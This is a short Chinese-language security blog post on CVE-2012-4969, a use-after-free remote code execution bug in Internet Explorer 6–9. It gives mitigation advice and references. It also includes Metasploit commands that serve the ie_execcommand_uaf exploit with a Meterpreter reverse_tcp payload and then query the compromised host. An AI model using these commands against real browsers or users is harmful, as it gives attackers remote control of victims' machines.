IE execCommand函数的远程代码执行0day

CVE-2012-4969

描述:

mshtml.dll中的CMshtmlEd::Exec函数释放后重用,导致远程代码执行。远程攻击者可以通过一个精心制作的网站执行特定代码。于2012年9月被广泛利用。

受影响的IE版本:IE6、IE7、IE8、IE9

MSF 测试 :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

解决方案:

  1. 安装微软紧急发布的补丁:补丁地址
  2. 使用其他浏览器如:chrome 、firefox等

Reference:

http://technet.microsoft.com/en-us/security/advisory/2757760

http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/

Join the Conversation

2 Comments

  1. Pingback: Samantha
Leave a comment

Your email address will not be published. Required fields are marked *